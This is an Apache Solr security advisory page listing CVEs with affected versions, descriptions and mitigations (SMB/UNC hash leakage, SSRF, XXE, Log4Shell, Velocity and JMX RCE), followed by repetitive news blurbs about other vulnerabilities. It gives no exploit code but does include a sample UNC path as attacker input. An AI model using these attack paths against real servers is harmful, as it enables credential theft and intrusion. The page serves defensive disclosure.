Headline
CVE-2021-44548: Solr™ Security News
An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB attacks, which may result in: * The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes), * In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution This issue affects all Apache Solr versions prior to 8.11.1. This issue only affects Windows.
How to report a security issue
If you believe you have discovered a vulnerability in Solr, you may first want to consult the list of known false positives to make sure you are reporting a real vulnerability. Then please disclose responsibly by following these ASF guidelines for reporting.
You may file your request by email to [email protected].
More information
You will find more security related information on our Wiki: https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity, such as information on how to treat the automated reports from security scanning tools.
Recent CVE reports for Apache Solr
Below is a list of already announced CVE vulnerabilities. These are also available as an ATOM feed:
CVE#
Date
Announcement
CVE-2021-44548
2021-12-18
Apache Solr information disclosure vulnerability through DataImportHandler
CVE-2021-44228
2021-12-10
Apache Solr affected by Apache Log4J CVE-2021-44228
CVE-2021-27905
2021-04-12
SSRF vulnerability with the Replication handler
CVE-2021-29262
2021-04-12
Misapplied Zookeeper ACLs can result in leakage of configured authentication and authorization settings
CVE-2021-29943
2021-04-12
Apache Solr Unprivileged users may be able to perform unauthorized read/write to collections
CVE-2020-13957
2020-10-12
The checks added to unauthenticated configset uploads in Apache Solr can be circumvented
CVE-2020-13941
2020-08-14
Apache Solr information disclosure vulnerability
CVE-2019-17558
2019-12-30
Apache Solr RCE through VelocityResponseWriter
CVE-2019-12409
2019-11-18
Apache Solr RCE vulnerability due to bad config default
CVE-2019-12401
2019-09-09
XML Bomb in Apache Solr versions prior to 5.0
2019-08-14
[ANNOUNCE] 8.1.1 and 8.2.0 users check ENABLE_REMOTE_JMX_OPTS setting
CVE-2019-0193
2019-07-31
Apache Solr, Remote Code Execution via DataImportHandler
CVE-2019-0192
2019-03-06
Deserialization of untrusted data via jmx.serviceUrl in Apache Solr
CVE-2017-3164
2019-02-12
SSRF issue in Apache Solr
CVE-2018-1308
2018-04-08
XXE attack through Apache Solr’s DIH’s dataConfig request parameter
2021-12-18, CVE-2021-44548: Apache Solr information disclosure vulnerability through DataImportHandler ¶
Severity:
Moderate
Versions Affected:
All versions prior to 8.11.1. Affected platforms: Windows.
Description:
An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB attacks, which may result in:
- The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes),
- In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution
This issue affects all Apache Solr versions prior to 8.11.1. This issue only affects Windows.
Mitigation:
Upgrade to Solr 8.11.1, and/or ensure only trusted clients can make requests to Solr’s DataImport handler.
Credit:
Apache Solr would like to thank LaiHan of Nsfocus security team for reporting the issue
References:
Jira issue SOLR-15826
2021-12-10, Apache Solr affected by Apache Log4J CVE-2021-44228 ¶
Severity: Critical
Versions Affected: 7.4.0 to 7.7.3, 8.0.0 to 8.11.0
Description: Apache Solr releases prior to 8.11.1 were using a bundled version of the Apache Log4J library vulnerable to RCE. For full impact and additional detail consult the Log4J security page.
Apache Solr releases prior to 7.4 (i.e. Solr 5, Solr 6, and Solr 7 through 7.3) use Log4J 1.2.17 which may be vulnerable for installations using non-default logging configurations that include the JMS Appender, see https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126 for discussion.
Solr’s Prometheus Exporter uses Log4J as well but it does not log user input or data, so we don’t see a risk there.
Solr is not vulnerable to the followup CVE-2021-45046 and CVE-2021-45105. A listing of these and other CVEs with some justifications are listed in Solr’s wiki: https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity#SolrSecurity-SolrandVulnerabilityScanningTools
Mitigation: Any of the following are enough to prevent this vulnerability for Solr servers:
- Upgrade to Solr 8.11.1 or greater (when available), which will include an updated version (>= 2.16.0) of the Log4J dependency.
- If you are using Solr’s official docker image, it has already been mitigated in all versions listed as supported on Docker Hub: https://hub.docker.com/_/solr. You may need to re-pull the image.
- Manually update the version of Log4J on your runtime classpath and restart your Solr application.
- (Linux/MacOS) Edit your solr.in.sh file to include: SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
- (Windows) Edit your solr.in.cmd file to include: set SOLR_OPTS=%SOLR_OPTS% -Dlog4j2.formatMsgNoLookups=true
- Follow any of the other mitgations listed at https://logging.apache.org/log4j/2.x/security.html
The Log4J security page refers to setting log4j2.formatMsgNoLookups=true as a “discredited” mitigation. In reality, it depends. We’ve looked at the root cause and audited the code paths that lead to the vulnerability, and we feel confident in this mitigation being sufficient for Solr. See https://lists.apache.org/thread/kgh63sncrsm2bls884pg87mnt8vqztmz for discussion.
References: https://logging.apache.org/log4j/2.x/security.html
2021-04-12, CVE-2021-27905: SSRF vulnerability with the Replication handler ¶
Severity: High
Versions Affected: 7.0.0 to 7.7.3 8.0.0 to 8.8.1
Description: The ReplicationHandler (normally registered at “/replication” under a Solr core) has a “masterUrl” (also “leaderUrl” alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the “shards” parameter. Prior to this bug getting fixed, it did not.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Upgrade to Solr 8.8.2 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-15217
- Ensure that any access to the replication handler is purely internal to Solr. Typically, it’s only accessed externally for diagnostic/informational purposes.
Credit: Reported by Caolinhong(Skay) from QI-ANXIN Cert (QI-ANXIN Technology Group Inc.)
References: SOLR-15217: CVE-2021-27905: SSRF vulnerability with the Replication handler
2021-04-12, CVE-2021-29262: Misapplied Zookeeper ACLs can result in leakage of configured authentication and authorization settings ¶
Severity: High
Versions Affected: 7.0.0 to 7.7.3 8.0.0 to 8.8.1
Description: When starting Apache Solr versions prior to 8.8.2, configured with the SaslZkACLProvider or VMParamsAllAndReadonlyDigestZkACLProvider and no existing security.json znode, if the optional read-only user is configured then Solr would not treat that node as a sensitive path and would allow it to be readable. Additionally, with any ZkACLProvider, if the security.json is already present, Solr will not automatically update the ACLs.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Manually set appropriate ACLs on /security.json znode.
- Upgrade to Solr 8.8.2 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-15249
- Ensure that any access to zookeeper is only by trusted application.
Credit: Timothy Potter and Mike Drob, Apple Cloud Services
References: SOLR-15249: CVE-2021-29262: Misapplied Zookeeper ACLs can result in leakage of configured authentication and authorization settings
2021-04-12, CVE-2021-29943: Apache Solr Unprivileged users may be able to perform unauthorized read/write to collections ¶
Severity: High
Versions Affected: 7.0.0 to 7.7.3 8.0.0 to 8.8.1
Description: When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Upgrade to Solr 8.8.2 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-15233
- Use a different authentication plugin, such as the KerberosPlugin or HadoopAuthPlugin
Credit: Geza Nagy
References: SOLR-15233: CVE-2021-29943: Apache Solr Unprivileged users may be able to perform unauthorized read/write to collections
2020-10-12, CVE-2020-13957: The checks added to unauthenticated configset uploads in Apache Solr can be circumvented ¶
Severity: High
Versions Affected: 6.6.0 to 6.6.6 7.0.0 to 7.7.3 8.0.0 to 8.6.2
Description: Solr prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that’s uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Disable UPLOAD command in ConfigSets API if not used by setting the system property: configset.upload.enabled to false (see docs)
- Use Authentication/Authorization and make sure unknown requests aren’t allowed (see docs)
- Upgrade to Solr 8.6.3 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-14663
- No Solr API, including the Admin UI, is designed to be exposed to non-trusted parties. Tune your firewall so that only trusted computers and people are allowed access
Credit: Tomás Fernández Löbbe, András Salamon
References: SOLR-14925: CVE-2020-13957: The checks added to unauthenticated configset uploads can be circumvented
2020-08-14, CVE-2020-13941: Apache Solr information disclosure vulnerability ¶
Severity: Medium
Versions Affected:
Before Solr 8.6. Some risks are specific to Windows.
Description: Reported in SOLR-14515 (private) and fixed in SOLR-14561 (public), released in Solr version 8.6.0. The Replication handler (https://solr.apache.org/guide/8_6/index-replication.html#http-api-commands-for-the-replicationhandler) allows commands backup, restore and deleteBackup. Each of these take a location parameter, which was not validated, i.e you could read/write to any location the solr user can access.
On a windows system SMB paths such as \10.0.0.99\share\folder may also be used, leading to:
- The possibility of restoring another SolrCore from a server on the network (or mounted remote file system) may lead to:
- Exposing search index data that the attacker should otherwise not have access to
- Replacing the index data entirely by loading it from a remote file system that the attacker controls
- Launching SMB attacks which may result in:
- The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes),
- In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution
Mitigation: Upgrade to Solr 8.6, and/or ensure only trusted clients can make requests of Solr’s replication handler.
Credit: Matei “Mal” Badanoiu
2019-12-30, CVE-2019-17558: Apache Solr RCE through VelocityResponseWriter ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected: 5.0.0 to 8.3.1
Description:
The affected versions are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting params.resource.loader.enabled by defining a response writer with that setting set to true. Defining a response writer requires configuration API access.
Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is trusted (has been uploaded by an authenticated user).
Mitigation:
Ensure your network settings are configured so that only trusted traffic communicates with Solr, especially to the configuration APIs.
Credit:
Github user s00py
References:
- https://issues.apache.org/jira/browse/SOLR-13971
- https://issues.apache.org/jira/browse/SOLR-14025
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2019-11-18, CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected:
Solr 8.1.1 and 8.2.0 for Linux
Description:
The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr.
Windows users are not affected.
If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.
The vulnerability is already public [1] and mitigation steps were announced on project mailing lists and news page [3] on August 14th, without mentioning RCE at that time.
Mitigation:
Make sure your effective solr.in.sh file has ENABLE_REMOTE_JMX_OPTS set to ‘false’ on every Solr node and then restart Solr. Note that the effective solr.in.sh file may reside in /etc/defaults/ or another location depending on the install. You can then validate that the ‘com.sun.management.jmxremote*’ family of properties are not listed in the “Java Properties” section of the Solr Admin UI, or configured in a secure way.
There is no need to upgrade or update any code.
Remember to follow the Solr Documentation’s advice to never expose Solr nodes directly in a hostile network environment.
Credit:
Matei “Mal” Badanoiu
Solr JIRA user ‘jnyryan’ (John)
References:
[1] https://issues.apache.org/jira/browse/SOLR-13647
[3] https://solr.apache.org/news.html
2019-09-09, CVE-2019-12401: XML Bomb in Apache Solr versions prior to 5.0 ¶
Severity: Medium
Vendor:
The Apache Software Foundation
Versions Affected:
- 1.3.0 to 1.4.1
- 3.1.0 to 3.6.2
- 4.0.0 to 4.10.4
Description:
Solr versions prior to 5.0.0 are vulnerable to an XML resource consumption attack (a.k.a. Lol Bomb) via it’s update handler. By leveraging XML DOCTYPE and ENTITY type elements, the attacker can create a pattern that will expand when the server parses the XML causing OOMs
Mitigation:
- Upgrade to Apache Solr 5.0 or later.
- Ensure your network settings are configured so that only trusted traffic is allowed to post documents to the running Solr instances.
Credit:
Matei “Mal” Badanoiu
References:
- https://issues.apache.org/jira/browse/SOLR-13750
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2019-08-14, [ANNOUNCE] 8.1.1 and 8.2.0 users check ENABLE_REMOTE_JMX_OPTS setting ¶
Severity: Low
Versions Affected: 8.1.1 and 8.2.0 for Linux
Description: It has been discovered [1] that the 8.1.1 and 8.2.0 releases contain a bad default setting for the ENABLE_REMOTE_JMX_OPTS setting in the default solr.in.sh file shipping with Solr.
Windows users and users with custom solr.in.sh files are not affected.
If you are using the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on JMX_PORT (default = 18983), without any authentication. So if your firewalls allows inbound traffic on JMX_PORT, then anyone with network access to your Solr nodes will be able to access monitoring data exposed over JMX.
Mitigation: Edit solr.in.sh, set ENABLE_REMOTE_JMX_OPTS=false and restart Solr. Alternatively wait for the future 8.3.0 release and upgrade.
References: [1] https://issues.apache.org/jira/browse/SOLR-13647
2019-07-31, CVE-2019-0193: Apache Solr, Remote Code Execution via DataImportHandler ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected:
- 5.0.0 to 5.5.5
- 6.0.0 to 6.6.5
Description:
The DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request’s “dataConfig” parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property enable.dih.dataConfigParam to true.
Mitigation:
- Upgrade to 8.2.0 or later, which is secure by default.
- or, edit solrconfig.xml to configure all DataImportHandler usages with an “invariants” section listing the “dataConfig” parameter set to am empty string.
- Ensure your network settings are configured so that only trusted traffic communicates with Solr, especially to the DIH request handler. This is a best practice to all of Solr.
Credit:
Michael Stepankin (JPMorgan Chase)
References:
- https://issues.apache.org/jira/browse/SOLR-13669
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2019-03-06, CVE-2019-0192: Deserialization of untrusted data via jmx.serviceUrl in Apache Solr ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected:
- 5.0.0 to 5.5.5
- 6.0.0 to 6.6.5
Description:
ConfigAPI allows to configure Solr’s JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr’s unsafe deserialization to trigger remote code execution on the Solr side.
Mitigation:
Any of the following are enough to prevent this vulnerability:
- Upgrade to Apache Solr 7.0 or later.
- Disable the ConfigAPI if not in use, by running Solr with the system property “disable.configEdit=true”
- If upgrading or disabling the Config API are not viable options, apply patch in [1] and re-compile Solr.
- Ensure your network settings are configured so that only trusted traffic is allowed to ingress/egress your hosts running Solr.
Credit:
Michael Stepankin
References:
- https://issues.apache.org/jira/browse/SOLR-13301
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2019-02-12, CVE-2017-3164: SSRF issue in Apache Solr ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected: Apache Solr versions from 1.3 to 7.6.0
Description:
The “shards” parameter does not have a corresponding whitelist mechanism, so it can request any URL.
Mitigation:
Upgrade to Apache Solr 7.7.0 or later. Ensure your network settings are configured so that only trusted traffic is allowed to ingress/egress your hosts running Solr.
Credit:
dk from Chaitin Tech
References:
- https://issues.apache.org/jira/browse/SOLR-12770
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2018-04-08, CVE-2018-1308: XXE attack through Apache Solr’s DIH’s dataConfig request parameter ¶
CVE-2018-1308: XXE attack through Apache Solr’s DIH’s dataConfig request parameter
Severity: Major
Vendor:
The Apache Software Foundation
Versions Affected:
- Solr 1.2 to 6.6.2
- Solr 7.0.0 to 7.2.1
Description:
The details of this vulnerability were reported to the Apache Security mailing list.
This vulnerability relates to an XML external entity expansion (XXE) in the &dataConfig=<inlinexml> parameter of Solr’s DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. See [1] for more details.
Mitigation:
Users are advised to upgrade to either Solr 6.6.3 or Solr 7.3.0 releases both of which address the vulnerability. Once upgrade is complete, no other steps are required. Those releases disable external entities in anonymous XML files passed through this request parameter.
If users are unable to upgrade to Solr 6.6.3 or Solr 7.3.0 then they are advised to disable data import handler in their solrconfig.xml file and restart their Solr instances. Alternatively, if Solr instances are only used locally without access to public internet, the vulnerability cannot be used directly, so it may not be required to update, and instead reverse proxies or Solr client applications should be guarded to not allow end users to inject dataConfig request parameters. Please refer to [2] on how to correctly secure Solr servers.
Credit:
麦 香浓郁
References:
[1] https://issues.apache.org/jira/browse/SOLR-11971
[2] https://cwiki.apache.org/confluence/display/solr/SolrSecurity
Related news
A researcher claims to have found a decade-old vulnerability rated 9.9 that affects all GNU/Linux systems, allowing attackers…
While distilling risk down to a simple numerical score is helpful for many in the security space, it is also an imperfect system that can often leave out important context.
An issue was discovered in the function gdev_prn_open_printer_seekable() in Artifex Ghostscript through 10.02.0 allows remote attackers to crash the application via a dangling pointer.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that multiple nation-state actors are exploiting security flaws in Fortinet FortiOS SSL-VPN and Zoho ManageEngine ServiceDesk Plus to gain unauthorized access and establish persistence on compromised systems. “Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized
Progress Chef Infra Server before 15.7 allows a local attacker to exploit a /var/opt/opscode/local-mode-cache/backup world-readable temporary backup path to access sensitive information, resulting in the disclosure of all indexed node data, because OpenSearch credentials are exposed. (The data typically includes credentials for additional systems.) The attacker must wait for an admin to run the "chef-server-ctl reconfigure" command.
Categories: Exploits and vulnerabilities Categories: News Tags: Oracle Tags: WebLogic Tags: CVE-2023-21839 Tags: CVE-2023-1389 Tags: CVE-2021-45046 Tags: CISA Tags: reverse shell An easy to exploit vulnerability in Oracle WebLogic Server has been added to the CISA list of things you really, really need to patch. (Read more...) The post Oracle WebLogic Server vulnerability added to CISA list as “known to be exploited” appeared first on Malwarebytes Labs.
Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack. This issue affects Apache OFBiz: before 18.12.07.
In Docker Desktop 4.17.x the Artifactory Integration falls back to sending registry credentials over plain HTTP if the HTTPS health check has failed. A targeted network sniffing attack can lead to a disclosure of sensitive information. Only users who have Access Experimental Features enabled and have logged in to a private registry are affected.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
ThingsBoard 3.4.1 could allow a remote attacker to gain elevated privileges because hard-coded service credentials (usable for privilege escalation) are stored in an insecure format. (To read this stored data, the attacker needs access to the application server or its source code.)
SQL Injection vulnerability in Talend ESB Runtime 7.3.1-R2022-09-RT thru 8.0.1-R2022-10-RT when using the provisioning service.
An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.
Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
The subgroup of an Iranian nation-state group known as Nemesis Kitten has been attributed as behind a previously undocumented custom malware dubbed Drokbk that uses GitHub as a dead drop resolver to exfiltrate data from an infected computer, or to receive commands. "The use of GitHub as a virtual dead drop helps the malware blend in," Secureworks principal researcher Rafe Pilling said. "All the
Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.
Though there have been fewer than expected publicly reported attacks involving the vulnerability, nearly three-quarters of organizations remain exposed to it.
A lack of MFA remains one of the biggest impediments to enterprise security.
The good news: The Apache Commons Text library bug is far less likely to lead to exploitation than last year's Log4j library flaw.
Categories: Exploits and vulnerabilities Categories: News Tags: Chinese APT Tags: advanced persistent threat Tags: APT Tags: CISA Tags: NSA Tags: FBI Tags: security advisory CISA, the NSA and the FBI have compiled a list of the vulnerabilities targeted by state-sponsorted threat actors from China. (Read more...) The post Chinese APT's favorite vulnerabilities revealed appeared first on Malwarebytes Labs.
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020. The agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked
Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.
Trustwave report also finds 2022 is set to surpass 2021 for volume of critical CVEs
Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.
Commodity malware usage surpasses ransomware by narrow margin By Caitlin Huey. For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments. Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan ...
Open-Xchange App Suite versions 7.10.6 and below suffer from OS command injection and cross site scripting vulnerabilities. One particular cross site scripting issue only affects versions 7.10.5 and below.
Dell PowerStore, versions prior to 3.0.0.0, contains an OS Command Injection vulnerability in PowerStore T environment. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS command on the PowerStore underlying OS. Exploiting may lead to a system take over by an attacker.
Vulnerability will remain a "significant" threat for years to come and highlighted the need for more public and private sector support for open source software ecosystem, Cyber Safety Review Board says.
What are container image vulnerabilities?
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. "Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched,
Pure Storage FlashArray products running Purity//FA 6.2.0 - 6.2.3, 6.1.0 - 6.1.12, 6.0.0 - 6.0.8, 5.3.0 - 5.3.17, 5.2.x and prior Purity//FA releases, and Pure Storage FlashBlade products running Purity//FB 3.3.0, 3.2.0 - 3.2.4, 3.1.0 - 3.1.12, 3.0.x and prior Purity//FB releases are vulnerable to a privilege escalation via the manipulation of Python environment variables which can be exploited by a logged-in user to escape a restricted shell to an unrestricted shell with root privileges. No other Pure Storage products or services are affected. Remediation is available from Pure Storage via a self-serve “opt-in” patch, manual patch application or a software upgrade to an unaffected version of Purity software.
Pure Storage FlashArray products running Purity//FA 6.2.0 - 6.2.3, 6.1.0 - 6.1.12, 6.0.0 - 6.0.8, 5.3.0 - 5.3.17, 5.2.x and prior Purity//FA releases, and Pure Storage FlashBlade products running Purity//FB 3.3.0, 3.2.0 - 3.2.4, 3.1.0 - 3.1.12, 3.0.x and prior Purity//FB releases are vulnerable to a privilege escalation via the manipulation of Python environment variables which can be exploited by a logged-in user to escape a restricted shell to an unrestricted shell with root privileges. No other Pure Storage products or services are affected. Remediation is available from Pure Storage via a self-serve “opt-in” patch, manual patch application or a software upgrade to an unaffected version of Purity software.
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
An infinite loop in OPC UA .NET Standard Stack 1.04.368 allows a remote attackers to cause the application to hang via a crafted message.
A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.
A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.
Dell PowerStore versions 2.0.0.x, 2.0.1.x and 2.1.0.x contains an open port vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to information disclosure and arbitrary code execution.
Couchbase Server before 7.1.0 has Incorrect Access Control.
EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.
Calibre-Web before 0.6.18 allows user table SQL Injection.
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
VMware Workspace ONE Access 21.08, 20.10.0.1, and 20.10 contain an authentication bypass vulnerability. A malicious actor, who has successfully provided first-factor authentication, may be able to obtain second-factor authentication provided by VMware Verify.
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
Published on: 2021 Dec 11, updated 2022 Apr 6. SUMMARY SUMMARY Microsoft continues our analysis of the remote code execution vulnerabilities related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. Currently, Microsoft is not aware of any impact, outside of the initial disclosure involving Minecraft: Java Edition, to the security of our enterprise services and has not experienced any degradation in availability of those services as a result of this vulnerability.
